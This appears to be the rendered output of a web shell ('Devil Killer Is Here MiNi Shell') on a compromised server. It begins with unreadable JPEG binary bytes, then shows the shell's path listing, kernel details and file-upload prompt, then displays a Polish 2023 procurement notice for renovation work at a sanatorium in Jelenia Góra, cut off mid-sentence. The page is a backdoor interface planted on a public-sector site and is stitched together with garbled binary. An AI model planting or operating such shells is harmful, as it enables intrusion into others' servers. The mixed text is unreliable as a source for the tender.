JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230509/0020705001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostosowanie obiektu do wymagań obowiązujących przepisów prawa z zakresu bezpieczeństwa pożarowego, dostosowanie dla osób niepełnosprawnych ciągów komunikacyjnych - I piętro budynku głównego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SANATORIUM UZDROWISKOWE MINISTERSTWA SPRAW WEWNĘTRZNYCH I ADMINISTRACJI &#34;AGAT&#34; W JELENIEJ GÓRZE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SP ZOZ Sanatorium Uzdrowiskowe MSWiA &#34;AGAT&#34; w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230081055</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cervi 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(075) 75 520 64 do 68</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sanatorium-agat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sanatorium-agat.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie obiektu do wymagań obowiązujących przepisów prawa z zakresu bezpieczeństwa pożarowego, dostosowanie dla osób niepełnosprawnych ciągów komunikacyjnych - I piętro budynku głównego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7db795d2-ee49-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00207050</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00079692/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Dostosowanie obiektu do wymagań obowiązujących przepisów prawa z zakresu: bezpieczeństwa pożarowego dostosowania do osób niepełnosprawnych ciągów komunikacyjnych – I piętro budynku głównego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7db795d2-ee49-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja pomiędzy<br/>Zamawiającym a Wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji) odbywa się<br/>elektronicznie:<br/>a. przy użyciu Platformy zakupowej o której mowa w Rozdziale I niniejszej SWZ,<br/>2) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia w BZP lub Identyfikator Postępowania z Platformy zakupowej.<br/>3) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki.<br/>4) Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w:<br/>a. rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz<br/>b. rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>5) Dokumenty elektroniczne przekazuje się przy użyciu środków komunikacji elektronicznej wskazanych w niniejszej SWZ.<br/>6) Forma złożenia oferty - zgodnie z pkt. XI.1 niniejszej SWZ.<br/>7) Zamawiający dopuszcza również możliwość komunikacji z Wykonawcami za pomocą poczty elektronicznej, (adres<br/>zamawiającego podany w pkt. I niniejszej Specyfikacji), w tym również możliwość składania dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem<br/>niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego<br/>2) Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa<br/>Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach. 3) Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f) archiwizacji postępowania.<br/>4) Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>5) Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z<br/>przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>6) Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a) prawo dostępu do danych (art. 15),<br/>b) prawo sprostowania danych (art. 16),<br/>c) prawo do usunięcia danych (art. 17),<br/>d) prawo do ograniczenia przetwarzania danych (art. 18).<br/>e) prawo wniesienia skargi do organu nadzorczego.<br/>7) Osobie, której dane dotyczą nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia<br/>RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO,<br/>8) Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może<br/>wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>9) Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>10) Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in.<br/>z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych<br/>osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SAN-2374/340/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia stanowi<br/>Szczegółowy zakres robót:<br/>- W miarę postępu prac wykonanie w wyznaczonych miejscach tymczasowych zabudów<br/>oddzielających miejsce prowadzenia robót od czynnej części budynku.<br/>- Zabezpieczenie istniejącej stolarki okiennej i drzwiowej oraz innych elementów<br/>wyposażenia folią budowlaną osłonową.<br/>- Demontaż, bezpieczne przechowanie elementów i ponowny montaż zabudowy szklanej<br/>punktu usługowego, zlokalizowanego na korytarzu skrzydła dwójek.<br/>- Rozebranie i dostarczenie oraz wykonanie nowej zabudowy punktu informacyjnego,<br/>znajdującego się w korytarzu łącznika prowadzącego do stołówki. Forma realizacji<br/>zadania: „ZAPROJEKTUJ I WYBUDUJ”.<br/>- Rozebranie boazerii, opasek wokół drzwi, zabudowy szachtów instalacyjnych.<br/>- Zerwanie wykładziny dywanowej.<br/>- Rozebranie posadzek z deszczułek z oderwaniem listew lub cokołów.<br/>- Demontaż i ponowny montaż grzejników stojących na posadzce.<br/>- Wymiana drzwi wejściowych z poszerzeniem otworów drzwiowych do pomieszczeń<br/>gospodarczych wraz z robotami towarzyszącymi w skrzydle dwójek w sąsiedztwie<br/>apartamentu.<br/>- Podmurowanie otworów szachtów instalacyjnych ponad posadzkę.<br/>- Zabezpieczenie instalacji p.poż. przed uszkodzeniem wraz z przełożeniem<br/>niezbędnych jej fragmentów i osprzętu zamontowanego na powierzchni istniejącej<br/>boazerii.<br/>- Gruntowanie powierzchni sufitów i ścian przed montażem płyt gipsowo-kartonowych<br/>ogniochronnych oraz przed ułożeniem gładzi.<br/>- Wykonanie okładziny z płyt gipsowo-kartonowych ogniochronnych mocowanych na<br/>plackach z kleju gipsowego montażowego w miejscu rozebranej boazerii ściennej<br/>wraz z pracami przygotowawczymi.<br/>- Wykonanie gładzi wapiennych na sufitach i ścianach wraz z montażem narożników<br/>ochronnych aluminiowych.<br/>- Osadzenie nowych zabudów szachtów instalacyjnych metalowych otwieranych z<br/>zamknięciem (min. w dwóch punktach góra - dół), malowanych proszkowo – kolor do<br/>ustalenia z Inwestorem.<br/>- Przygotowanie powierzchni do wykonania warstwy wyrównawczej pod posadzkę z<br/>płytek ceramicznych - czyszczenie, odkurzanie, gruntowanie, itd.<br/>- Wykonanie dylatacji obwodowej przy ścianach z taśmy ze spienionego pcv szer. 100<br/>mm.<br/>- Wykonanie warstwy wyrównawczej cementowej.<br/>- Ułożenie posadzek z płytek ceramicznych typu gres, rektyfikowanych w klasie<br/>antypoślizgowości min. R11.<br/>- Wykonanie cokolika przypodłogowego z płytek ceramicznych typu gres o wysokości 12<br/>cm.<br/>- Wymiana i założenie nowych listew maskujących w progach drzwi oraz w miejscach<br/>połączenia posadzek z innych materiałów.<br/>- Wypełnienie masą silikonową naroży wewnętrznych - płytka podłogowa/cokolik.<br/>- Przygotowanie powierzchni tynków sufitów i ścian starych oraz nowych do<br/>malowania.<br/>- Malowanie sufitów farbami emulsyjnymi.<br/>- Malowanie ścian farbami emulsyjnymi o zwiększonej odporności na ścieranie oraz<br/>zabrudzenia.<br/>- Malowanie grzejników, rur przyłączeniowych oraz pionów c.o. w strefie ciągów<br/>komunikacyjnych.<br/>- Montaż elastycznych odbojnic płaskich klejonych lub samoprzylepnych – pas o szer.<br/>500 mm na ustalonej wysokości od posadzki.<br/>- Wymiana wskazanych tablic energetycznych rozdzielczych piętrowych.<br/>- Wymiana istniejących opraw oświetleniowych sufitowych świetlówkowych na oprawy<br/>sufitowe energooszczędne typu LED.<br/>- Usunięcie i wywiezienie gruzu i materiałów pochodzących z rozbiórki.<br/>Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 1 (przedmiar robót), 2 (specyfikacja techniczna wykonania i odbioru robót budowlanych) i 3 (rysunki) do SWZ.<br/>2. Wszystkie dokumenty określone w pkcie 1 są wiążące. Specyfikacja techniczna oraz<br/>przedmiar robót i rysunki są dokumentami wzajemnie się uzupełniającymi. Wszystkie elementy<br/>ujęte w specyfikacji technicznej i przedmiarze robót, a nie ujęte na rysunkach lub ujęte na<br/>rysunkach, a nie ujęte w specyfikacji technicznej i przedmiarze robót, winny być traktowane<br/>tak jakby były ujęte we wszystkich dokumentach.<br/>3. W przypadku wystąpienia jakichkolwiek rozbieżności lub sprzeczności pomiędzy<br/>zapisami Specyfikacji Warunków Zamówienia oraz dokumentów, o których mowa w pkcie 1,<br/>ustala się następującą kolejność pod względem ważności zapisów: Specyfikacja Techniczna<br/>Wykonania i Odbioru Robót, Dokumentacja projektowa (tj. Przedmiar robót i rysunki),<br/>Specyfikacja Warunków Zamówienia.<br/>4. Informacje dodatkowe:<br/>1) Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami,<br/>normami i warunkami technicznymi, w szczególności z przepisami ustawy z dnia<br/>7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 z późn. zm.).<br/>2) Przedmiar robót stanowi element pomocniczy do wyliczenia ceny ryczałtowej<br/>robót. Ewentualne błędy w w/w dokumencie nie będą stanowiły podstawy do<br/>roszczeń Wykonawcy względem Zamawiającego.<br/>3) Zamawiający protokolarnie przekaże Wykonawcy plac budowy (rejon<br/>prowadzenia prac) wraz ze wszystkimi wymaganymi uzgodnieniami,<br/>pozwoleniami prawnymi i administracyjnymi. Wykonawca<br/>rozpocznie realizację prac w obiekcie po protokolarnym przekazaniu placu<br/>budowy.<br/>4) Wykonawca odpowiada za teren budowy i bezpieczeństwo podczas realizacji<br/>zamówienia od dnia pisemnego przejęcia terenu prowadzenia prac<br/>do zakończenia i ostatecznego odbioru przedmiotu zamówienia.<br/>5) Prace prowadzone będą na terenie budynku Sanatorium na czynnym obiekcie.<br/>Na czas prowadzenia prac odpowiednie fragmenty budynku będą wyłączone<br/>z działalności jaką na co dzień prowadzi Sanatorium. W trakcie wykonywania<br/>przedsięwzięcia budowlanego nie przewiduje się utrudnień, które mogłyby mieć<br/>wpływ na prowadzenie robót. Czas prowadzenia prac szczególnie uciążliwych<br/>(kucie, wiercenie itp.) należy każdorazowo ustalać z Zamawiającym<br/>(Inwestorem). Wykonawca zobowiązany jest wygrodzić teren robót i oznaczyć<br/>strefy niebezpieczne, a ponadto oddzielić odpowiednimi kurtynami<br/>antypyłowymi od pozostałej części obiektu.<br/>6) Do obowiązków Wykonawcy należy zabezpieczenie przed zabrudzeniem oraz<br/>uszkodzeniami mechanicznymi złożonego wyposażenia jednostek mieszkalnych,<br/>istniejących podłóg i posadzek na ciągach komunikacyjnych, z których<br/>Wykonawca będzie korzystał w czasie prowadzenia robót budowlanych.<br/>7) Wykonawca na własny koszt zabezpiecza zaplecze budowy poprzez postawienie<br/>odpowiednich kontenerów socjalnych i magazynowych w miejscu wskazanym<br/>przez Zamawiającego - na terenie przyległym do budynku Sanatorium.<br/>8) Wykonawca zobowiązuje się na swój koszt wykonać i utrzymać ogrodzenie strefy<br/>prowadzenia robót, a także strzec mienia znajdującego się na terenie budowy -<br/>rejonie prowadzenia prac. W czasie realizacji robót Wykonawca będzie<br/>utrzymywał teren budowy w stanie wolnym od przeszkód komunikacyjnych oraz<br/>będzie usuwał zbędne materiały, odpady, śmieci do własnych kontenerów na gruz<br/>i niepotrzebne urządzenia.<br/>9) Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu<br/>i przekazania go Zamawiającemu w dniu podpisania protokołu ostatecznego<br/>odbioru robót.<br/>10) Wykonawca po zakończeniu robót rozliczy się z Zamawiającym (Inwestorem)<br/>za zużytą wodę i energię elektryczną na podstawie faktury VAT wystawionej<br/>przez Zamawiającego z 7-dniowym terminem płatności. Koszty z tego tytułu<br/>zostaną ustalone po zawarciu umowy z wybranym Wykonawcą - na zasadzie<br/>ryczałtu, uwzględniającego zgłoszone przez Wykonawcę: ilość pracowników<br/>skierowanych do realizacji przedmiotu umowy, urządzenia stosowane przy<br/>realizacji przedmiotu umowy i ich moc, liczbę przewidywanych roboczogodzin,<br/>a także stawki opłat wynikające z umów zawartych przez Zamawiającego<br/>z dostawcami mediów.<br/>11) Zamawiający wymaga udzielenia przez Wykonawcę:<br/>a) gwarancji na wykonane roboty przez okres minimum 48 miesięcy od dnia<br/>ostatecznego bezusterkowego odbioru przedmiotu umowy;<br/>b) rękojmi za wady przedmiotu zamówienia przez okres minimum 48 miesięcy<br/>od dnia ostatecznego bezusterkowego odbioru przedmiotu umowy (tożsamy<br/>z okresem gwarancji, o którym mowa w lit. a).<br/>12) Okres gwarancji, o której mowa w pkt 12 lit. a, stanowi jedno<br/>z punktowanych kryteriów oceny ofert, stąd Wykonawca może wydłużyć<br/>oferowany okres gwarancji - na zasadach określonych w Dziale XIV<br/>Specyfikacji Warunków Zamówienia. W takiej sytuacji okres rękojmi za wady<br/>wydłuży się automatycznie o przedłużony okres gwarancji.<br/>13) Wybrany Wykonawca - w okresie realizacji przedmiotu umowy - zobowiązany<br/>jest do posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną w wysokości co najmniej 100 000 zł.<br/>14) Wykonawca zobowiązany jest - najpóźniej w dniu zawarcia umowy - przedłożyć<br/>Zamawiającemu poświadczoną za zgodność z oryginałem kopię dokumentu<br/>potwierdzającego posiadanie ubezpieczenia od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną w wysokości określonej w pkt 14. W przypadku przedłożenia<br/>dokumentu, z którego wynikać będzie, że okres ważności ubezpieczenia OC<br/>wygaśnie przed upływem terminu realizacji przedmiotu umowy, Wykonawca<br/>będzie zobowiązany do przedłużenia ważności tego ubezpieczenia lub zawarcia<br/>kolejnej umowy ubezpieczeniowej, i przedłożenia Zamawiającemu najpóźniej<br/>w dniu, w którym upływa ważność pierwotnego ubezpieczenia, poświadczonej za<br/>zgodność z oryginałem kopii dokumentu potwierdzającego ciągłość<br/>ubezpieczenia OC - z zachowaniem opisanych powyżej wymagań<br/>Zamawiającego.<br/>5. Informacja dotycząca wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp,<br/>dotyczących zatrudniania przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy<br/>osób wykonujących czynności w zakresie realizacji zamówienia, została ujęta w Załączniku nr 7<br/>Specyfikacji Warunków Zamówienia.<br/>8. Zasady realizacji i rozliczania zamówienia zostały określone w Projekcie umowy,<br/>stanowiącym Załącznik Nr 8 do Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">172 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do<br/>szczegółowego rozpatrywania, jeżeli:<br/>1.1. 